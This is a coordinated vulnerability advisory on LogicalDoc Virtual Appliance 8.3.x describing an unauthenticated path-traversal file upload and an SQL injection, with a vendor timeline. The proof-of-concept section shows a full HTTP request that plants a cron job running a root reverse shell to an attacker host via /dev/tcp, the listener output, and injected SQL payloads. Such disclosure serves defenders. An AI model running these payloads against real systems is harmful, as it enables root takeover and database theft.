LogicalDoc Virtual Appliance Multiple Vulnerabilities
1. Advisory Information
Title: LogicalDoc Virtual Appliance Multiple Vulnerabilities
Advisory ID: CORE-2020-004
Date published: 2020-03-18
Date of last update: 2020-03-17
Vendors contacted: LogicalDoc
Release mode: Coordinated release
2. Vulnerability Information
Class: Unrestricted Upload of File with Dangerous Type [CWE-434], Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') [CWE-22], SQL Injection [CWE-89]
Impact: Code execution allows privilege escalation
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2020-9423; CVE-2020-10365
3. Vulnerability Description
LogicalDoc [1] is a global software company that sells an enterprise document management system (DMS) designed to provide administration and serve as a repository for an organization’s content.
Multiple vulnerabilities were found in the Virtual Appliance version, which would allow a remote unauthenticated attacker to upload arbitrary files that could lead to the execution of arbitrary commands with root privileges.
4. Vulnerable Packages
- LogicalDoc 8.3.1
- LogicalDoc 8.3
Other products and versions might be affected, but they were not tested.
5. Vendor Information, Solutions, and Workarounds
LogicalDoc published a patched version of the product on 2019-08-30 with the 8.3.3 release which fixes these issues.
6. Credits
These vulnerabilities were discovered and researched by Ivan Huertas from Core Security Consulting Services.
The publication of this advisory was coordinated by Pablo A. Zurro from Core Advisories Team.
7. Technical Description / Proof of Concept Code
LogicalDoc Virtual Appliance is a free virtual appliance version of the LogicalDoc Document Management tool. It is designed to be deployed inside an organization's network infrastructure. It comes bundled with a Web Management Console for documents, messaging systems, user management, and other services.
Multiple vulnerabilities were found in the context of this appliance, which could allow a remote attacker to compromise the whole system. Vulnerabilities described in 7.1 and 7.2 could allow an attacker to upload arbitrary files which lead to command execution and dump data from the database.
7.1 Arbitrary file upload leading to remote command execution
[CVE-2020-9423] LogicalDoc provides a functionality to add documents. Those documents could then be used for multiple tasks, such as version control, shared among users, applying tags, etc. This functionality could be abused by an unauthenticated attacker to upload an arbitrary file in a restricted folder. This would lead to the executions of malicous commands with root privileges.
The following proof of concept demonstrates the vulnerability: Firstly, we used the mechanism called "Add Documents" to add a new document in the following path: /frontend/document. A pop-up appears where multiple files could be dragged and dropped. In the background a request to /servlet.gupld is performed. This last servlet is vulnerable to an arbitrary file upload and a path traversal, as we are able to change the path by inserting ../ characters in the name parameter of the request.
As an extra verification, we performed this exact request without providing a session cookie and trying to store the file in the /etc/cron.d/ directory. This file contained commands to execute a reverse shell to our attack server. This was confirmed so an unauthenticated attack could exploit this issue.
POST /servlet.gupld HTTP/1.1 Host: 10.106.91.25 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------675725876718999651035521338 Content-Length: 321 Connection: close Upgrade-Insecure-Requests: 1 -----------------------------675725876718999651035521338 Content-Disposition: form-data; name="../../../../../../../../etc/cron.d/partialPath"; filename="vgauth.conf" Content-Type: text/html * * * * * root /bin/bash -i >& /dev/tcp/10.106.91.24/8089 0>&1 -----------------------------675725876718999651035521338-- HTTP/1.1 200 Set-Cookie: JSESSIONID=931447C141982D63AAAD8A1E4BCB11E6; Path=/; HttpOnly Cache-Control: no-cache X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Content-Security-Policy: default-src * 'unsafe-inline' 'unsafe-eval'; script-src * 'unsafe-inline' 'unsafe-eval'; connect-src * 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src 'self' https://*.google.com https://*.zoho.com ; frame-ancestors *; style-src * 'unsafe-inline'; Content-Type: text/plain;charset=UTF-8 Date: Tue, 16 Jul 2019 16:47:38 GMT Connection: close Server: Undisclosed/8.41 Content-Length: 441 %%%INI%%%@@^^^?xml version="1.0" encoding="UTF-8"?^^^@@ @@^^^response^^^@@@@^^^files^^^@@@@^^^file^^^@@@@^^^ctype^^^@@text/html@@^^^/ctype^^^@@ @@^^^size^^^@@63@@^^^/size^^^@@ @@^^^field^^^@@../../../../../../../../etc/cron.d/partialPath-0@@^^^/field^^^@@ @@^^^name^^^@@vgauth.conf@@^^^/name^^^@@ @@^^^/file^^^@@ @@^^^/files^^^@@ @@^^^finished^^^@@ok@@^^^/finished^^^@@ @@^^^parameters^^^@@@@^^^/parameters^^^@@ @@^^^/response^^^@@ %%%END%%%
One minute after sending the request, we received the reverse connection on our server. Since the web server is running with root privileges, our reverse shell had the maximum privileges on the system.
[.....CONSOLE ON OUR ATTACK SERVER.....] root@kali-burp:~# nc -nlvp 8089 listening on [any] 8089 ... connect to [10.106.91.24] from (UNKNOWN) [10.106.91.25] 33102 bash: no job control in this shell root@logicaldoc ~]#whoami whoami root root@logicaldoc ~]#
7.2 SQL injection
[CVE-2020-10365] LogicalDoc populates the list of available documents by querying the database. This list could be filtered by modifying some of the parameters. We confirmed that some of them are not properly sanitized, which could allow an authenticated attacker to perform arbitrary queries to the database. Below is a common request to retrieve the list of documents:
GET /data/documents.xml?locale=en&folderId=4&filename=salesfusion&max=100&indexed=&page=1 HTTP/1.1 Host: 10.106.91.25 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://10.106.91.25/frontend.jsp If-Modified-Since: Thu, 01 Jan 1970 00:00:00 GMT Cookie: JSESSIONID=9DBE50DF71DF092F4CB2C01EBE5E314C; ldoc-sid=d0c30aa5-9819-4c44-917e-455155d5e93a; GLog=%7B%0A%20%20%20%20trackRPC%3Afalse%0A%7D Connection: close HTTP/1.1 200 Cache-Control: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Pragma: no-cache X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Content-Security-Policy: default-src * 'unsafe-inline' 'unsafe-eval'; script-src * 'unsafe-inline' 'unsafe-eval'; connect-src * 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src 'self' https://*.google.com https://*.zoho.com ; frame-ancestors *; style-src * 'unsafe-inline'; Content-Type: text/xml;charset=UTF-8 Content-Length: 938 Date: Tue, 16 Jul 2019 17:39:18 GMT Connection: close Server: Undisclosed/8.41
3604484 4 generic 1.0 2019-07-16T17:39:01 2019-07-16T17:39:01 2019-07-16T17:39:01 734 0 0 0 false 0 0 false 0 2019-07-16T04:00:00 yes
Boolean-based SQL Injection is a SQL Injection technique that relies on sending an SQL query to the database which forces the application to return a different result depending on whether the query returns a TRUE or FALSE result. We tampered with the filename parameter to create a valid SQL query. Below is an example of a TRUE statement:
GET /data/documents.xml?locale=en&folderId=4&filename=salesfusion'+OR+NOT+9907%3d9907+AND+'ynwj'+LIKE+'ynwj&max=100&indexed=&page=1 HTTP/1.1 Host: 10.106.91.25 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://10.106.91.25/frontend.jsp If-Modified-Since: Thu, 01 Jan 1970 00:00:00 GMT Cookie: JSESSIONID=9DBE50DF71DF092F4CB2C01EBE5E314C; ldoc-sid=d0c30aa5-9819-4c44-917e-455155d5e93a; GLog=%7B%0A%20%20%20%20trackRPC%3Afalse%0A%7D Connection: close HTTP/1.1 200 Cache-Control: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Pragma: no-cache X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Content-Security-Policy: default-src * 'unsafe-inline' 'unsafe-eval'; script-src * 'unsafe-inline' 'unsafe-eval'; connect-src * 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src 'self' https://*.google.com https://*.zoho.com ; frame-ancestors *; style-src * 'unsafe-inline'; Content-Type: text/xml;charset=UTF-8 Content-Length: 938 Date: Tue, 16 Jul 2019 18:07:36 GMT Connection: close Server: Undisclosed/8.41
3604484 4 generic 1.0 2019-07-16T17:52:50 2019-07-16T17:39:01 2019-07-16T17:39:01 734 0 0 1 false 0 0 false 0 2019-07-16T04:00:00 yes
Below is an extract of information retrieved by sending multiple SQL queries:
[13:37:28] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL 5 [13:37:28] [INFO] fetching database names [13:37:28] [INFO] fetching number of databases [13:37:28] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval [13:37:28] [INFO] retrieved: [13:37:29] [INFO] fetching current database [13:37:29] [INFO] retrieved: logicaldoc [13:37:31] [INFO] fetching tables for database: 'logicaldoc' [13:37:31] [INFO] fetching number of tables for database 'logicaldoc' [13:37:31] [INFO] retrieved:
8. Report Timeline
2019-07-18 – Core Security made initial contact with LogicalDoc, including a draft advisory with two vulnerabilities.
2019-08-30 – Vulnerabilities solved by LogicalDoc in version 8.3.3.
2020-02-26 – Applied for first CVE via MITRE website, received confirmation of application.
2020-02-28 – MITRE assigns CVE-2020-9423 to first vulnerability.
2020-03-10 – Applied for CVEs via MITRE for second vulnerability. MITRE assigns CVE-2020-10365.
2020-03-18 – Advisory published.
9. References
[1] https://www.logicaldoc.com/
10. About CoreLabs
CoreLabs, the research center of Core Security, A Fortra Company is charged with researching and understanding security trends as well as anticipating the future requirements of information security technologies. CoreLabs studies cybersecurity trends, focusing on problem formalization, identification of vulnerabilities, novel solutions, and prototypes for new technologies. The team is comprised of seasoned researchers who regularly discover and discloses vulnerabilities, informing product owners in order to ensure a fix can be released efficiently, and that customers are informed as soon as possible. CoreLabs regularly publishes security advisories, technical papers, project information, and shared software tools for public use at www.coresecurity.com/core-labs.
11. About Core Security, A Fortra Company
Core Security, a Fortra Company, provides organizations with critical, actionable insight about who, how, and what is vulnerable in their IT environment. With our layered security approach and robust threat-aware, identity & access, network security, and vulnerability management solutions, security teams can efficiently manage security risks across the enterprise. Learn more at www.coresecurity.com.
Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or [email protected].
12. Disclaimer
The contents of this advisory are copyright (c) 2020 Core Security and (c) 2020 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/